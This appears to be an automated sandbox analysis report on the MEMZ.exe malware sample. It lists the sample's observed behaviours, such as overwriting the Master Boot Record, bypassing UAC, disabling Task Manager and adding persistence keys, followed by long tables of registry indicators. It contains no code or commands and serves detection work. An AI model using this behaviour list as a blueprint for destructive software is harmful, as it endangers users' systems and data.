Analysis Overview
SHA256
fdaf5db4f6ea7dce12bbd41267a11432980cb29522e3311c34d34894437a9a15
Threat Level: Known bad
The file . was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
UAC bypass
Modifies extensions of user files
Downloads MZ/PE file
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Obfuscated with Agile.Net obfuscator
Checks computer location settings
Loads dropped DLL
Modifies system executable filetype association
Reads user/profile data of web browsers
Executes dropped EXE
Drops desktop.ini file(s)
Adds Run key to start application
Writes to the Master Boot Record (MBR)
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Modifies Control Panel
Suspicious behavior: RenamesItself
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy WMI provider
Suspicious use of WriteProcessMemory
System policy modification
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Enumerates system info in registry
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Volume Shadow Copy service COM API
Suspicious behavior: GetForegroundWindowSpam
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies registry class
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-04-11 14:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-11 14:43
Reported
2023-04-11 14:51
Platform
win10-20230220-en
Max time kernel
279s
Max time network
452s
Command Line
Signatures
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133257050506956160" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "50" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d9f2981a956cd901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{BA38096A-A65C-41CC-89F5-8BD67DB9FF7C} = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "o3f0sim" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 3df8bf635a45d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\softonic.com\NumberOfSubdoma = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OpenSearch | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 9e041252956cd901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
